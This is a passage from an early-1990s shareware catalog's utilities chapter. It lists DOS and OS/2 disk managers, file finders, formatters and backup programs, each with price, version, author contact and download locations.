dithering print and adjust + brightness & contrast. Image catalogs can be searched for + user-supplied keywords or other criteria. + + 2.1.2 Hard disk utilities + + Product: ActaeOn + Hard Disk Manager. See full description on page 101. + + Product: BCS Menu Program + Bristol Computing Professional Menu System. See full + description on page 93. + + Product: Command Post + Programmable Shell/File Mgr. for Windows 3.0. See full + description on page 104. + + Product: DaMenu [***] + Needs: IBM PC, DOS 3.3 or better. Hard disk, EGA monitor. + Author: Just-In-Time Computing Services, 607-257-6517 + Registration: $15.00 + Version: 1.1 (04-02-92) + User benefits: Master disks, phone/CompuServe support. + Look for: DAMENU11.EX on BBSs (call 607-533-7072 to download it + at no charge); DMENU1.EXE in IBMSYS forum LIB 5 on CompuServe. + Download size: 130k + Description: + An easy to use, intuitive DOS menu system for novices and + advanced users! Increases your productivity and features: + * No memory overhead, not memory resident + * Mouse Support + * Network Compatible + * Built-in screen saver with user selectable delay + * Password protection for applications & 'Exit to DOS' + * File passing/command line option + + Chapter 2, "Utilities" 14 + + + + * Easy menu modification + * Up to 9 menus and a total of 72 applications + + Product: DIRECT MAINT + Needs: IBM PC, DOS 2.1 or better. Hard disk, 380k RAM. + Author: MORSOFT, 512-561-0731 + Registration: $29.95 + Version: 2.0 (07-01-89) + User benefits: Printed manual, phone support, one free upgrade. + Look for: availability unknown on BBSs; DIRCMA.ZIP in IBMSYS + forum LIB 5 on CompuServe; DIRCMAIN.ZIP in IBMPC RTC LIB 5 on + GEnie. + Download size: 286k + Description: + Tame your hard disk and forget DOS with this directory and file + manager. Formatted directory and file display, point & shoot + menus for copy, move, compare, erase all, selected or marked + files. Change file names, dates, times, attributes. Run + programs with the stroke of a key. Easily locate & erase + inactive and duplicate files to save precious disk space. View + two disks or two directories on same disk on same screen at the + same time, find any file on any disk quickly, and much, much, + more. + + Product: Director + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 2.03 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: DIRED203.ZIP on BBSs; DIRED2.ZIP in IBMSYS forum LIB 3 + on CompuServe. + Download size: 15k + Description: + Fast, easy way to display or record your disk directory + structure. You can use the data to rebuild your disk after a + crash, or to set up new systems with similar structure. + + Product: DIREDIT + File/Directory listing and sorting utility. See full + description on page 102. + + Product: Disk Manager (CUDM) + Disk Catalog system. See full description on page 10. + + Chapter 2, "Utilities" 15 + + + + Product: Disk OrGanizer (DOG) + Needs: IBM PC, DOS 2.11 or better. EMS memory may be needed for + very large hard disks. + Author: Soft GAM's Software, 707-961-1632 + Registration: $30.00 + Version: 3.14 (08-18-91) + User benefits: Printed manual, master disks. + Look for: DOG314.ZIP on BBSs (call 707-778-8944 to download it at + no charge); DOG.ZIP in IBMHW forum LIB 1 on CompuServe. + Download size: 40k + Description: + This file defragmentation utility will improve the the speed + that files can be read from and written to a disk. Can also + recover some disk space by "freeing" space that directories are + no longer using. Can recover from a power failure and has many + features to improve safety and speed. + + Product: DOS Extensions for Professional + Needs: IBM PC, DOS 3.0 or better. + Author: Allison Software, 412-727-2198 + Registration: $59.00 + Version: 1.1 (09-02-91) + User benefits: Printed manual, latest version, reduced price + updates as available. + Look for: availability unknown on BBSs. + Download size: 274k + Description: + DIFF Highlights differences between file versions. + DUMP Displays binary files, dirs, sectors, FAT's, & + cluster chains. + SEARCH Quickly finds files anywhere by contents. + SPLIT Breaks large files into pieces by four methods. + SUB Replaces chars, tabs, and spaces in text files. + A flexible script generator. + XDEL Performs tree deletes on files and dirs, + overwriting for security. + XDIR Lists, finds, totals, and sorts files & trees. + + Product: Dupes + Finds duplicate/empty files & empty dirs. See full description + on page 27. + + Product: Duplicate File Locator (DFL) + Needs: IBM PC, DOS 3.0 or better. 400k RAM. + Author: W.S. Ataras Engineering, 301-249-1141 + Registration: $40.00 + Version: 3.11 (01-01-91) + User benefits: Phone & modem support. Printed manual. Bug + fixes. 30 day money-back guarantee. Upgrade/follow-up notices. + Look for: DFL311S.ZIP on BBSs (call 408-384-3658 to download it + at no charge); DFL*.ZIP in IBMNET forum LIB 6 on CompuServe. + Download size: 150k + Description: + * Pulldown menus with context help + + Chapter 2, "Utilities" 16 + + + + * Find files with identical names, lengths, contents via + CRC32 or bin compare + * Find Path duplicates like DFL.EXE, DFL.BAT & DFL.COM + * View, Del, Binary or custom compare, Tag & delete, Print + or Export the list + * Use mask like *.* + * Multiple drives & network drives + * Handles huge disks + * Batch run unattended + * Performs above on archived files + * Customizable for up to 10 archive types + * Pre-customized for ZIP/PAK/LZH/PKA/ARJ/ARC/ZOO + + Product: EDDY (EDit DirectorY) + Needs: IBM PC, DOS 2.0 or better. + Author: John Scofield + Registration: $20.00 + Version: 6b2 (01-04-92) + User benefits: Technical support, free upgrade. + Look for: EDDY6B*.ZIP on BBSs (call 215-678-9334 to download it + at no charge); EDDY6B.ZIP in CLMFORUM forum LIB 4 on + CompuServe. + Download size: 200k + Description: + * Full-screen directory editor + * Disk & directory manager + * Backup & recovery utility + * File finder, viewer & patcher + * Hex/text string finder & replacer + * Sector editor, RAM editor + * Powerful DOS shell + ...and MUCH more! + + "Computer Language" says: + "The interface ... is elegant." + "...clean, easy-to-use, well-written program." + "...quality of product we've seen from Peter Norton." + + Product: FILE-MAN + Needs: IBM PC, DOS 3.0 or better. + Author: Micrometric, 813-377-2515 + Registration: $30.00 + Version: 4.21 (05-24-91) + User benefits: Printed & bound 7'x8.5' manual, one yr. phone/mail + support, next release notification. + Look for: FILE@421.ZIP on BBSs. + Download size: 194k + Description: + A menu driven utility program that aids in managing disk files. + Directory and file names are displayed in sorted order with + file names sorted by name, extension, date or size. Single + files or groups may be quickly marked and then acted upon. The + actions include copy, move, spawn, append, erase, rename, + change attribute status, display, print and locate. Features + + Chapter 2, "Utilities" 17 + + + + include context sensitive help, macro procedures, directory + tree, diskette labels and program parameter customization. + + Product: FLEXIBAK Plus [***] + Flexible Hard Disk Backup System. See full description on + page 30. + + Product: Globally + Executes commands/programs in multiple dirs. See full + description on page 74. + + Product: Globally/2 + Executes commands/programs in multiple dirs. See full + description on page 74. + + Product: HandyDOS [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Abri TEchnologies, Inc. + Registration: $25.00 + Version: 1.2 (02-27-92) + User benefits: Three months support. + Look for: availability unknown on BBSs; HDOS.EXE in IBMSYS forum + LIB 3 on CompuServe. + Download size: 74k + Description: + A set of several most wanted utilites: + BAK can delete all *.bak and NULL files from disk or + directory. + MV can move files or whole directories around disk. + D changes directories by simple number reference. + DELTREE deletes whole unwanted directory. + ...and other handy utilities. + + Product: Hard at Work [***] + You take a break while the computer "works" See full + description on page 360. + + Product: Hard Disk Director + Hard Disk Menu and Shell. See full description on page 105. + + Product: HDTEST + Needs: IBM PC, DOS 2.0 or better. 312k RAM. + Author: Computer Counselors, Inc., 215-527-4408 + Registration: $35.00 + Version: 5.35a (10-20-91) + User benefits: Latest version of program on disk. Telephone and + mail support. Notice of upgrades, bug fixes, etc. + Look for: availability unknown on BBSs; HDTEST.ZIP in IBMHW forum + LIB 1 on CompuServe. + Download size: 142k + Description: + Allows thorough READ/WRITE testing of a hard disk partition or + floppy disk without disturbing data on the disk. Data from a + problem area is moved to a known good area, and the disk's FAT + + Chapter 2, "Utilities" 18 + + + + and directory entries are adjusted to preserve the structure of + the file of which it is a part. Recognizes and tests large + partitions created by MS/PC DOS 4.xx or 5.xx, as well as + proprietary partitions created by SpeedStor or Disk Manager. + + Product: JDIR [***] + Needs: IBM PC, DOS 3.0 or better. + Author: Cybernetic Software, 708-677-8358 + Registration: $10.00 + Version: 1.1 (01-11-90) + User benefits: Master disks, source code. + Look for: JDIR11.ZIP on BBSs (call 312-764-0591 to download it at + no charge). + Download size: 8k + Description: + Provides an alphabetical directory list in 4 columns. File + attributes are displayed instead of the time and date stamp. If + there are more files than can be fit on one screen, the program + will automatically pause at the end of each screen. + + Product: LCD: Led's Change Directory + Needs: IBM PC, DOS 3.3 or better. + Author: Keith Ledbetter, 804-674-0780 + Registration: $15.00 + Version: 3.1a (05-06-91) + User benefits: Registered users receive a BRAND utility to embed + their name into future upgrades and free voice support. + Look for: LCD_31A.ZIP on BBSs (call 804-790-1675 to download it + at no charge); LCD31A.ZIP in IBMSYS forum LIB 6 on CompuServe; + LCD_31A.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 30k + Description: + Voted by the Public (software) Library publication as one of + "the 10 best utilities of 1990". Helps you quickly and easily + change between subdirectories on your hard drives. Supports + "fuzzy matching" logic. Can even act as a total replacement + for DOS's CD, RD, and MD commands. Fully supports EGA/VGA 43 + and 50 line screen modes. Stop typing commands like "CD + \PCPLUS\DOWNLOAD\NEW"; it's as simple as "LCD NEW"! Network + aware; supports up to 4,000 directories. + + Product: LK4.EXE + Needs: IBM PC, DOS 3.0 or better. + Author: GTX Software, 213-257-2704 + Registration: $10.00 + Version: 2.0 (10-20-91) + User benefits: Free upgrades for one year. + Look for: LK4.ZIP on BBSs (call 414-789-4352 to download it at no + charge); LK4.ZIP in IBMSYS forum LIB 6 on CompuServe. + Download size: 33k + Description: + A fast file finder that searches across all hard drives or + selected drives. User enters a string and it will search all + hard drives for filenames containing the string. If LK4 is + + Chapter 2, "Utilities" 19 + + + + entered without a search string, it will search hard drives for + duplicate filenames. When it completes the search, all located + files are displayed in a window and the user may view, tag, or + delete selected files. Users may also automatically change to + the directory containing the selected file. + + Product: LOGIK MENU + Menu System, 43/50 lines, Mouse, Events, Log. See full + description on page 96. + + Product: LoveDOS [***] + The computer falls in love with you. See full description on + page 360. + + Product: Mass-Store Copy + Copy disks with only one drive. (Opticals!). See full + description on page 31. + + Product: Nifty James's File Finder + Needs: IBM PC, DOS 2.0 or better. + Author: Mike Blaszczak, 203-292-1356 + Registration: $15.00 + Version: 2.00 (03-04-91) + User benefits: Upgrade discounts. + Look for: availability unknown on BBSs; NJFIND.ZIP in IBMSYS + forum LIB 3 on CompuServe. + Download size: 35k + Description: + Lets you search one or more of your disk drives for a given + file name. The program automatically searches through ARC, + PKZIP, LHARC, ZOO, PAK, and DWC archives. Numerous options + allow custom reporting abilities. + + Product: NJ's File Finder for Windows + Needs: IBM PC, Windows 3.0 or better. + Author: Mike Blaszczak, 203-292-1356 + Registration: $15.00 + Version: 1.00 (06-10-91) + User benefits: Upgrade discounts. + Look for: availability unknown on BBSs; NJWFIN.LZH in IBMSYS + forum LIB 3 on CompuServe. + Download size: 45k + Description: + A complete rewrite of NJFIND for the Microsoft Windows + environment. It searches any hard drive or network drive for + the specified filename, and reports the results to the user. + Any found file may then be launched. Supports ARC, ARJ, DWC, + LHARC, LHA, PKZIP, ZOO, and PAK archives. Full context- + sensitive and index help! + + Product: OffLoad + File archiving system. See full description on page 35. + + Chapter 2, "Utilities" 20 + + + + Product: An Ounce Of Prevention + Disaster-prevention/data-protection system. See full + description on page 106. + + Product: PALERT + Verify enough disk freespace before using pgm. See full + description on page 66. + + Product: PCOPY + Needs: IBM PC, DOS 2.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Version: 9.0D (04-01-91) + User benefits: Update of current version and future enhancements. + $45 purchases 8 utilities with bound manual. Money back + gurantee. + Look for: PCOPY90D.ZIP on BBSs (call 714-352-2825 to download it + at no charge); PCOPY9.ZIP in IBMSYS forum LIB 6 on CompuServe; + PCOPY90D.ZIP in IBMPC-615 RTC LIB 5 on GEnie. + Download size: 105k + Description: + Offers the COPY utility DOS should have provided. Even with + DOS 5.0, DOS COPY can be dangerous to use and has limited + options. PCOPY's abundant options include: Multiple output + disks, fill disks efficiently, split files across disks, select + files by date/time/size, update/merge dirs and more. Special + *DISK*.* type wildcards. Scan/Make directories, prevent + accidental file overlays. Menu or command driven. Featured in + PC Computing July 1991 - Taming your Hard Disk by Preston + Gralla. + + Product: PDEL + Needs: IBM PC, DOS 3.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Version: 4.2 (12-26-90) + User benefits: Latest version, BBS Access and Updates. $45 gets + package of 8 utilities with bound manual. Money Back Gurantee. + Money Back Gurantee. + Look for: PDEL42.ZIP on BBSs (call 714-352-2825 to download it at + no charge); PDEL42.ZIP in IBMSYS forum LIB 6 on CompuServe; + PDEL42.ZIP in IBMPC-615 RTC LIB 5 on GEnie. + Download size: 62k + Description: + Offers the file delete utility that DOS should have provided. + Extensive file selection capabilities let you delete just what + you want. Select by date/time, size, attribute, special + wildcard patterns like *DISK*.* and mode. Delete until a + specified amount of freespace exists. Wipe file data before + deleting to prevent file undelete. Test feature simulates + delete. Emergency stop by pressing any key. Recommended in PC + Computing July 1991 - Taming your Hard Disk by Preston Gralla. + + Chapter 2, "Utilities" 21 + + + + Product: Professional Master Key + Needs: IBM PC, DOS 2.0 or better. Hard disk (except large IDE + drives) - Not for Digital Research's DR DOS. + Author: Public Brand Software, 317-856-7535 + Registration: $35.00 + Version: 3.2 (04-10-91) + User benefits: BBS, phone, and mail support - disk with latest + version - printed manual - notice of upgrades. + Look for: PMK32.ZIP on BBSs (call 317-856-2087 to download it at + no charge); PMK32.ZIP in IBMHW forum LIB 1 on CompuServe. + Download size: 205k + Description: + ALTER read-only, system, hidden attributes + EDIT files and sectors directly (hex editor) + EXPLORE disk configuration, statistics, etc. + FILL files and disks with patterns to prevent + unerasure (DOD compliant) + LOCATE files in subdirectories ("WHEREIS") + MAP disk and file usage - detect fragmentation + SET file date and time ("TOUCH") + SORT and move directory entries on the disk + UNERASE files - very easy to use + UNFORMAT most hard disks + + Product: PSEARCH + Needs: IBM PC, DOS 2.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Version: 4.4e (04-10-91) + User benefits: Latest version, BBS access and updates. $45 gets + 8 utility package with bound manual. Money Back gurantee. + Look for: PS44E.ZIP on BBSs (call 714-352-2820 to download it at + no charge); PS44E.ZIP in IBMSYS forum LIB 6 on CompuServe; + PS44E.ZIP in IBMPC-615 RTC LIB 5 on GEnie. + Download size: 85k + Description: + Used by thousands of users to locate files on hard disks. You + provide it with words or phrases, and it will scan a directory, + directory tree, or all directories to find any file containing + the text. Extensive file selection and pattern matching are + provided. Not only finds files but provides colorful display + of found text. Can also drive other commands for found files. + A must have utility. Recommended in PC World as one of the + Best of Shareware products in 1990 (October 1990). + + Chapter 2, "Utilities" 22 + + + + Product: PTOUCH + Needs: IBM PC, DOS 2.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $10.00 + Version: 2.0 (08-18-90) + User benefits: Current version and updates. $45 gets package of + all 8 utilities. + Look for: PTOUCH2.ZIP on BBSs (call 714-352-2825 to download it + at no charge). + Download size: 15k + Description: + Lets you modify the date and time DOS keeps in file directories + for each file. You may either set them to the current date/ + time or to any specific value you desire. Useful for + correcting date/time when the system clock was improperly set. + Can also be used to set a group of files to the same date/time + value. This helps associate them as a synchronized group. Part + of the Patriquin Utilities. + + Product: PullDown SAA Menu Shell + SAA CUA Compliant Dialog Boxed Menu System. See full + description on page 99. + + Product: Renamer + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 1.01 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: RENDD101.ZIP on BBSs; RENDD1.ZIP in IBMSYS forum LIB 1 + on CompuServe. + Download size: 13k + Description: + Renames directories, quick & easy. Eliminates need to create a + new directory, copy files from old directory, delete the old + files, then delete the old directory. Works even on full + disks. + + Product: Renamer/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 1.01 (07-07-91) + User benefits: Eligibility for free upgrades. + Look for: RENDO101.ZIP on BBSs; REND01.ZIP in IBMSYS forum LIB 2 + on CompuServe. + Download size: 14k + Description: + Renames directories, quick & easy from the command line. + Eliminates need to create new directory, copy files from old + directory, delete old files, then delete the old directory. + + Chapter 2, "Utilities" 23 + + + + Product: SLIM + Transparent File Compression System. See full description on + page 36. + + Product: SST: the Supersonic Search Tool + Needs: IBM PC, DOS 2.1 or better. + Author: Keith Ledbetter, 804-674-0780 + Registration: $15.00 + Version: 5.2b (05-12-91) + User benefits: Registered users receive a BRAND utility to embed + their name into all future versions and free voice support. + Look for: SST_52B.ZIP on BBSs (call 804-790-1675 to download it + at no charge); SST52B.ZIP in IBMSYS forum LIB 6 on CompuServe; + SST_52B.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 50k + Description: + The "grand-daddy" of all file-finders, this program has been + around since 1988 (previously named simply "WhereIs") and is + regularly being upgraded to keep up with the times (and ahead + of the competition). SST supports searching within all major + archive formats, regular-expression ("grep") searching on both + filename and 4DOS descriptions, size ranges, date ranges, + verified deletion, duplicate file searching, command execution + on found files, and too many other features to list. Network + compatible. + + Product: TreeTop + Hard Disk File and Directory Manager. See full description on + page 103. + + Product: XDIR + Needs: IBM PC, DOS 2.0 or better. + Author: XD Systems, 703-821-3215 + Registration: $25.00 + Version: 3.05 (03-09-91) + User benefits: Disk and printed manual; telephone and CIS + support; utilities for registered users automate inclusion of + comments in ZIP files (XDZIP/ZDUNZIP), and keep track of the + number of times your files are accessed and the day of last + use(XDCOUNT/XDUPDATE). + Look for: availability unknown on BBSs; XDIR30.ZIP in IBMSYS + forum LIB 1 on CompuServe. + Download size: 58k + Description: + A commented directory utility that replaces the DOS DIR + command. You can attach a descriptive comment of up to 65 + characters to each file. The comment will appear in the + directory display. Makes sure that comments will stay with + your files when you COPY, RENAME or MOVE them. Can RUN + programs from the directory list and supports executable + extensions, automatically recognizing the appropriate + application to launch for each selected file. + + Chapter 2, "Utilities" 24 + + + + 2.1.3 Floppy disk utilities + + Product: Disk DUP + Needs: IBM PC, DOS 3.2 or better. + Author: FormGen Corp., 416-857-4141 + Registration: $25.00 + Version: 5.9a (11-08-90) + User benefits: Printed manual, master disks, unlimited technical + support, product discounts. + Look for: DUP59A.EXE on BBSs; DUP59.EXE in IBMHW forum LIB 1 on + CompuServe. + Download size: 75k + Description: + Speeds the duplication of disks. Master images are stored on + hard drive, but data compression saves valuable space. Copies + can be produced at lightning speed. Multi-disk option for up to + ten drives at once! Disks can be serialized at your option. + Many options, excellent user interface, full status screen. + Very powerful, yet easy to use! If you need to make multiple + copies of disks, DUP will make it quick and easy. + + Product: Disk Manager (CUDM) + Disk Catalog system. See full description on page 10. + + Product: DISKLIST + Needs: IBM PC, DOS 2.1 or better. + Author: Gulf Sierra, 301-460-0354 + Registration: $25.00 + Version: 2.10 (04-24-91) + User benefits: Master disks, phone/mail support. Bonus + utilities. Shareware disks of other programs. + Look for: DISKLI21.ZIP on BBSs (call 202-547-2008 to download it + at no charge); DSKL21.ZIP in IBMSYS forum LIB 9 on CompuServe. + Download size: 134k + Description: + Produces diskette covers with the directory contents for 5.25 + inch, 3.5 inch, and hard disks. DISKLIST reads all + subdirectories. Displays on the printer, screen or a file. + Select from 33 formats that print from one to six columns of + file names with options to include date, time and file size. + Select the type of frame lines, IBM or ASCII. File names can be + sorted. File names in ZIP, ARC, PAK, ZOO, and LHZ can + optionally be displayed. Many more customizing features. For + all printers. + + Product: DiZk4D + st + The 1 DiZk Catalog & Label System For 4DOS. See full + description on page 11. + + Product: DJ-SLEEVE [***] + Print storage sleeves for floppies on Deskjet. See full + description on page 51. + + Chapter 2, "Utilities" 25 + + + + Product: Dupes + Finds duplicate/empty files & empty dirs. See full description + on page 27. + + Product: Easy Format + Needs: IBM PC, DOS 2.0 or better. + Author: Falk Data Systems, 915-584-7670 + Registration: $35.00 + Version: 3.20 (11-30-90) + User benefits: Bound printed manual, Bonus Disk Set, free + technical support, 60 day money back guarantee, free CompuServe + Introductory Membership, and discounts on other products and + publications. + Look for: EZF32*.ZIP (multiple files) on BBSs; EZF32*.ZIP in + IBMHW forum LIB 1 (multiple files) on CompuServe. + Download size: 308k + Description: + Gives you complete control over every detail of the format + process - four disk testing levels, six bad spot marking + options, volume labels, custom boot messages, and more. Four + programs including a DESQview-specific version for formating in + the background under DESQview. Three languages - English, + German and Spanish. Fully customizable. + + Comments from reviews: "The Most Versatile Disk Formatter in + the World!" "On a scale of 1 to 10, the Easy Format package + rates at least an 11!" + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 16. + + Product: FBNCAT + Disk Catalog Manager. See full description on page 11. + + Product: FormGen Utility Pak #1 + Needs: IBM PC, DOS 3.2 or better. + Author: FormGen Corp., 416-857-4141 + Registration: $25.00 + Version: 1.01 (10-30-90) + User benefits: Printed manual, master disks, unlimited technical + support, product discounts. + Look for: UPAK1.EXE on BBSs; UPAK.EXE in IBMSYS forum LIB 3 on + CompuServe. + Download size: 146k + Description: + 12 excellent utilities! + QCOPY fast single drive copy, makes multiple copies, + no swapping + SERA secure file erase *** MEETS DOD STANDARDS *** + DUMP high performance hex dump + ENCRYPT/DECRYPT + fast and very secure file encryption + FEED/EJECT TSR page eject + + Chapter 2, "Utilities" 26 + + + + GDAY your morning smile + SEARCH/GLOBAL + multifile search/replacement + LOCASE converts files to lower case + ZIPPROC automated file processing + TIMESYNC sets your system clock to time standard + + Product: Lite Format + Needs: IBM PC, DOS 2.0 or better. + Author: Falk Data Systems, 915-584-7670 + Registration: $14.95 + Version: 1.20 (03-15-91) + User benefits: Current version on disk, Bonus Disk, free + technical support, 60 money back guarantee, Free CompuServe + Introductory Membership, Discounts on other products and + publications. + Look for: LTFORMAT.ZIP on BBSs; LTFRMT.ZIP in IBMHW forum LIB 1 + on CompuServe. + Download size: 80k + Description: + A subset of the larger Easy Format package. Two small, fast + programs (written in assembly language) to format floppy + diskettes. Includes a DESQview-specific program for formatting + in the background under DESQview. The DESQview version + requires less than 18K bytes of memory for its small DESQview + window. Both programs handle all common diskette/drive + combinations. Marks bad spots like the standard DOS format + program. Includes a quick option to wipe a disk clean without + checking for bad spots. + + Product: MAXI Form + Needs: IBM PC, DOS 3.2 or better. 360k/720k/1.2meg/1.44meg + floppy drive. + Author: Herne Data Systems Ltd, 519-366-2732 + Registration: $10.00 + Version: 1.7 (02-14-92) + User benefits: Technical support plus upgrades for 60 days. + Look for: availability unknown on BBSs; MAXI*.ZIP in IBMHW forum + LIB 1 on CompuServe; MAXI*.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 71k + Description: + A floppy disk formatting program that gives more space on a + disk: 360k disks are expanded to 420k, 720 becomes 800k, 1.2 + meg becomes 1.4 meg and 1.44 meg is boosted to 1.6 meg. The + disks are user transparent to DOS version 3.20 or later and can + be used interchangeably with normal DOS disks. + + Product: OMNIDiZk + DiZk Cataloging And Labeling System. See full description on + page 12. + + Product: PDEL + Safe/Precise DOS delete. Extensive features. See full + description on page 20. + + Chapter 2, "Utilities" 27 + + + + Product: PS-SLEEVE [***] + PostScript floppy storage sleeve printer. See full description + on page 59. + + Product: SLIM + Transparent File Compression System. See full description on + page 36. + + + 2.2 File utilities + + Product: 4FILES [***] + File manager & annotator for 4DOS & NDOS. See full description + on page 100. + + Product: Changer/2 + Changes files without word a processor. See full description + on page 276. + + Product: dBF-View + DBF File viewer plus other usefull Utilities. See full + description on page 150. + + Product: Directory-Manifest + DOS Utility/shell. See full description on page 7. + + Product: Dupes + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 3.10 (01-11-92) + User benefits: Eligibility for free upgrades. + Look for: DUPED310.EXE on BBSs; DUPE31.EXE in IBMSYS forum LIB 6 + on CompuServe. + Download size: 29k + Description: + Lets you recover wasted disk space by finding duplicate files, + empty files & empty directories. Options to check multiple + drives or multiple diskettes, to restrict checks to certain + directories, to exempt one or more directories from checking, + to delete duplicates as they're found, & consider files + duplicates only if size & date/time stamps match. Supports + international date/time/number formats. + + Product: Duplicate File Locator (DFL) + Prcss dups in&out ALL arcs,disks. Many modes. See full + description on page 15. + + Chapter 2, "Utilities" 28 + + + + Product: FileFinder [***] + Needs: IBM PC, DOS 2.1 or better. Optionally uses LIST, QEDIT, + Shez, and word processor. + Author: California Software Design + Registration: $25.00 + Version: 3.8 (04-01-92) + User benefits: Unlimited BBS/CompuServe/GEnie/mail support. + Look for: FFF38.ZIP on BBSs (call 707-528-2261 to download it at + no charge); FFF38.ZIP in IBMSYS forum LIB 6 on CompuServe; + FFF38.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 103k + Description: + Helps you find files on any hard disk attached to your PC, + including network attached drives. Numerous search options are + available, including the ability to search for files using an + expanded wild card specification. I.E. *PRO* will find all + files that have the letters PRO anywhere in the file name. A + command line version and a full screen version are both + included. The full screen version will, search for duplicate + files, allow you to launch programs, plus much more. + + Product: Filer! [***] + Visual File Management for Ventura Publisher. See full + description on page 125. + + Product: FOURU + Four Handy Utilities. See full description on page 8. + + Product: JDIR [***] + 4 Across Alphabetical Directory List. See full description on + page 18. + + Product: LK4.EXE + File Finder. See full description on page 18. + + Product: Mover + Moves file between directories & disks. See full description + on page 8. + + Product: PATTR + Needs: IBM PC, DOS 2.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $15.00 + Version: 1.5 (12-26-90) + User benefits: Newest version and future updates. + Look for: PATTR15.ZIP on BBSs (call 714-352-2825 to download it + at no charge); PATTR.ARC in IBMSYS forum LIB 1 on CompuServe. + Download size: 25k + Description: + Sets DOS attributes for one or more files. Can process one or + more directories with a single command and advanced file + selection capabilities are provided. It is commonly used to + set or reset the DOS archive flag to cause or prevent files + + Chapter 2, "Utilities" 29 + + + + from becing processed by your favorite backup utility. Part of + the Patriquin Utilities. + + Product: PrintPlus + File and printer utility. See full description on page 45. + + Product: TextCon + Smart ASCII carriage return removal, cleanup. See full + description on page 129. + + 2.2.1 Backup/restore + + Product: Backup + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $10.00 + Version: 2.05 (06-16-91) + User benefits: Eligibility for free upgrades. + Look for: BACKD205.ZIP on BBSs; BACKD2.ZIP in IBMSYS forum LIB 6 + on CompuServe. + Download size: 23k + Description: + Fast, intelligent file backups. Copies files which don't exist + on the target drive, or whose date-time stamps are more recent + than target files. Options to clear archive bits, check volume + labels & backup from multiple directories. + + Product: Backup/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $10.00 + Version: 1.01 (07-07-91) + User benefits: Eligibility for free upgrades. + Look for: BACKO101.ZIP on BBSs; BACK01.ZIP in IBMSYS forum LIB 2 + on CompuServe. + Download size: 22k + Description: + Fast, intelligent file backups. Copies only files which don't + exist on target drive, or whose date-time stamps are more + recent than target files. Options to clear archive bit, check + volume labels & backup from multiple directories. + + Chapter 2, "Utilities" 30 + + + + Product: BakupWiz + Needs: IBM PC, DOS 2.1 or better. 512k RAM, hard disk, floppy + drive. + Author: PCX, 619-259-9797 + Registration: $59.00 + Version: 3.29fl (01-03-92) + User benefits: Printed manual/disk; unlimited phone/FAX/BBS + support; BETA tester eligibility; notification on upcoming + updates. + Look for: BWIZ.ZIP on BBSs (call 619-481-6479 to download it at + no charge); BWIZ.ZIP in IBMSYS forum LIB 6 on CompuServe. + Download size: 144k + Description: + Quick & reliable: speeds greater than 2 megabytes per minute. + Flexible: back up all files, any files you select, or any + changed files. Network support: NetWare 286 and 386 including + Apple File Protocol are supported. Directory and file access + privileges and binderies are backed up while users are still + logged onto the system. Secure: uses a password system to + shield your data. Easy to use: pull-down menus, helplines, and + message windows. + + Product: DirBack + Needs: IBM PC, DOS 3.0 or better. + Author: ShareGames, 619-283-0472 + Registration: $35.00 + Version: 3.6 (01-21-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: DIRBACK.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 140k + Description: + Makes daily disk backups a breeze. A few minutes a day keeps + your backups ready to restore your hard drive on a moments + notice. You only need to update the disks you know have + changed. You put the floppy in a drive and select pdate. + Even complex directory structures are handled automatically. It + never writes an older file on top of a newer version and only + spends time copying files that are new or have changed. Also + checks system file integrity at startup, and more. + + Product: Director + Displays & records disk directory structure. See full + description on page 14. + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 16. + + Chapter 2, "Utilities" 31 + + + + Product: FLEXIBAK Plus [***] + Needs: IBM PC, DOS 2.1 or better. Hard Disk. + Author: Nildram Software, 708-397-1221 + Registration: $59.00 + Version: 2.01 (03-11-92) + User benefits: Printed manual, master disks, lifetime phone/mail/ + BBS/CompuServe support, inexpensive upgrades. + Look for: FLEXP201.ZIP on BBSs (call 215-623-6203 to download it + at no charge); FP201.ZIP in IBMSYS forum LIB 6 on CompuServe. + Download size: 160k + Description: + The Ultimate Hard Disk Backup System For PCs Today. Features + include a unique filing method that gives far better file + management capabilities than other backup systems. This also + means that you only ever have to take a full backup once! + Includes inbuilt file compression, selective backups, support + for multiple hard disks (up to 20), and a handy backup reminder + alarm system. Unique among hard disk backup systems because it + looks after you. + + Product: LambChop + Needs: IBM PC, DOS 2.0 or better. 128k RAM, hard disk, floppy + drive. + Author: LambWare, 813-525-3162 + Registration: $30.00 + Version: 1.02 (01-21-92) + User benefits: Master disks, 90 days support. + Look for: LAMBCHOP.ZIP on BBSs; LAMCHP.EXE in IBMSYS forum LIB 6 + on CompuServe. + Download size: 175k + Description: + Absolutely the finest file chopping system available. If you + need to move big files from one machine to another with methods + much slicker than what's available, LambChop is for you. + Features: FASTer than xcopy, compression, error checking, drop + to DOS between disks, operates from the DOS command line or a + pull down menu system, directly access files when UnChopping, + restores file attributes and time, available memory is your + only limit! + + Chapter 2, "Utilities" 32 + + + + Product: Mass-Store Copy + Needs: IBM PC, DOS 3.1 or better. Hard disk; one removable disk + drive. + Author: Informative Technologies, 202-675-4528 + Registration: $59.00 + Version: 2.6 (04-01-91) + User benefits: Printed Manual with disk; one year of Phone/FAX/ + mail/Email/BBS 